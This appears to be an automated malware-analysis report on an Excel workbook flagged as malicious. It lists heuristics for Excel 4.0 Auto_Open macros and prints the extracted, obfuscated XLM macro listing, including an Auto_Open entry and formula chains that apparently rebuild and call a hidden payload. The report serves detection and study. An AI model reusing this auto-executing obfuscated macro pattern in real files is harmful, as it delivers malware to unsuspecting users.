MALICIOUS
Risk Score: 140
Heuristics: 3
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6649 bytes |

SHA-256: 9724ece1b3a54b281d71097971912e00ef70820aa2c4735234dab57bb16e2f7c

Preview script: first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 15 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - jNHFvs
' 0018 22 LABEL : Cell Value, String Constant - ahLcEXV len=0
' 0018 23 LABEL : Cell Value, String Constant - AsdUPPam len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!D166
' 0018 27 LABEL : Cell Value, String Constant - bqPXIcIngmFr len=0
' 0018 24 LABEL : Cell Value, String Constant - caQraVGBk len=0
' 0018 25 LABEL : Cell Value, String Constant - emJHBQlsmn len=0
' 0018 20 LABEL : Cell Value, String Constant - eoiYc len=0
' 0018 22 LABEL : Cell Value, String Constant - gDNAlFm len=0
' 0018 20 LABEL : Cell Value, String Constant - GHyei len=0
' 0018 21 LABEL : Cell Value, String Constant - GXxfmf len=0
' 0018 26 LABEL : Cell Value, String Constant - LcxptaYhuEH len=0
' 0018 24 LABEL : Cell Value, String Constant - lMJIjVrCP len=0
' 0018 20 LABEL : Cell Value, String Constant - mSams len=0
' 0018 27 LABEL : Cell Value, String Constant - PXhNyOfUJEBY len=0
' 0018 21 LABEL : Cell Value, String Constant - rQmbgr len=0
' 0018 27 LABEL : Cell Value, String Constant - SMjPJtIYAYRe len=0
' 0018 21 LABEL : Cell Value, String Constant - uAyPqh len=0
' 0018 21 LABEL : Cell Value, String Constant - VNWTJb len=0
' 0018 25 LABEL : Cell Value, String Constant - WeCfSEVERr len=0
' 0018 24 LABEL : Cell Value, String Constant - ylSoQjknW len=0
' 0018 21 LABEL : Cell Value, String Constant - YRUgWx len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' jNHFvs,D84,"SET.NAME("caQraVGBk",0+VALUE("0"))",""
' jNHFvs,D86,"SET.NAME("emJHBQlsmn",caQraVGBk)",""
' jNHFvs,D88,"SET.NAME("eoiYc",caQraVGBk)",""
' jNHFvs,D90,"SET.NAME("LcxptaYhuEH",COUNTA(gDNAlFm))",""
' jNHFvs,D93,"SET.NAME("VNWTJb",COUNTA(WeCfSEVERr))",""
' jNHFvs,P94,"",-615.00000000000000000000
' jNHFvs,P95,"",239.00000000000000000000
' jNHFvs,P96,"",-377.00000000000000000000
' jNHFvs,D97,[],""
' jNHFvs,P97,"",383.00000000000000000000
' jNHFvs,P98,"",707.00000000000000000000
' jNHFvs,D99,"SET.NAME("ylSoQjknW","")",""
' jNHFvs,P99,"",-908.00000000000000000000
' jNHFvs,D101,"emJHBQlsmn",""
' jNHFvs,D106,"SET.NAME("AsdUPPam",HLOOKUP("*",gDNAlFm,emJHBQlsmn,FALSE))",""
' jNHFvs,D108,"rQmbgr",""
' jNHFvs,D113,"SET.NAME("mSams",caQraVGBk)",""
' jNHFvs,D115,[],""
' jNHFvs,D120,"mSams",""
' jNHFvs,D122,"GHyei",""
' jNHFvs,D127,"YRUgWx",""
' jNHFvs,D132,"GXxfmf",""
' jNHFvs,D134,"SET.NAME("bqPXIcIngmFr",VALUE(HLOOKUP("*",WeCfSEVERr,GXxfmf,FALSE)))",""
' jNHFvs,D137,"PXhNyOfUJEBY",""
' jNHFvs,D141,"ylSoQjknW",""
' jNHFvs,D146,"eoiYc",""
' jNHFvs,D149,NEXT(),""
' jNHFvs,D152,"uAyPqh",""
' jNHFvs,D157,[],""
' jNHFvs,D159,"lMJIjVrCP",""
' jNHFvs,D161,NEXT(),""
' jNHFvs,D164,RETURN(),""
' jNHFvs,D190,"SET.NAME("ahLcEXV",D84)",""
' jNHFvs,D192,"gDNAlFm",""
' jNHFvs,D195,"SET.NAME("WeCfSEVERr",R46C11)",""
' jNHFvs,D197,"SET.NAME("lMJIjVrCP",203)",""
' jNHFvs,D199,"SET.NAME("SMjPJtIYAYRe",4)",""
' jNHFvs,D202,ahLcEXV(),""
' jNHFvs,D203,HALT(),""